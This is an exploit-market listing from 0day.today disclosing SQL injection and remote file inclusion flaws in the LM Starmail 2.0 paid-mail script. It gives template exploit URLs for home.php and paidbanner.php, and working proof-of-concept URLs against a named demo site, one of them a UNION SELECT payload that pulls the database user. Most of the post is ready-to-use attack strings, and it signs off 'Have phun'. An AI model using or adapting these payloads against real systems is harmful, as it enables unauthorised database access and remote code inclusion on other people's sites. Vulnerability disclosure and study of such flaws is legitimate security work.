[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LM Starmail 2.0 (SQL Injection/File Inclusion) Multiple Vulnerabilities

Author
int_main();
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5624
Category
web applications
Date add
05-08-2009
Platform
unsorted
=======================================================================
LM Starmail 2.0 (SQL Injection/File Inclusion) Multiple Vulnerabilities
=======================================================================


  [=] LM Starmail 2.0  (home.php & paidbanner.php) SQL Injection/File Inclusion Vuln
       
       Vendor   : http://www.script-shop24.de
       Script   : LM Starmail 2.0
       Download : http://www.script-shop24.de/product_info.php/info/p68_Starmail-2-0-Paidmail.html
       Author   : int_main();
       Contact  : someone[at]jabber.ccc.de
       Site     : 0xFEE1DEAD.de
       Greez    : BrainWash,Thunderbird,STEAL,The Papst,eddy14,MagicFridge,Patrick B,Hero,tmh,Lorenz,iNs,Cod1K
      


       Exploit:

       http://[target]/home.php?page=[evilscript]
       http://[target]/paidbanner.php?ID=[sql]

       POC:

       http://script-demo.eu/Luxusmailer5/home.php?page=http://google.de
       http://script-demo.eu/Luxusmailer5/paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--


       (File access is unfortunately disabled in this case, otherwise, this inclusion would work because of the coding gap.)

       Have phun, wui!

  [=]     




#  0day.today [2024-11-15]  #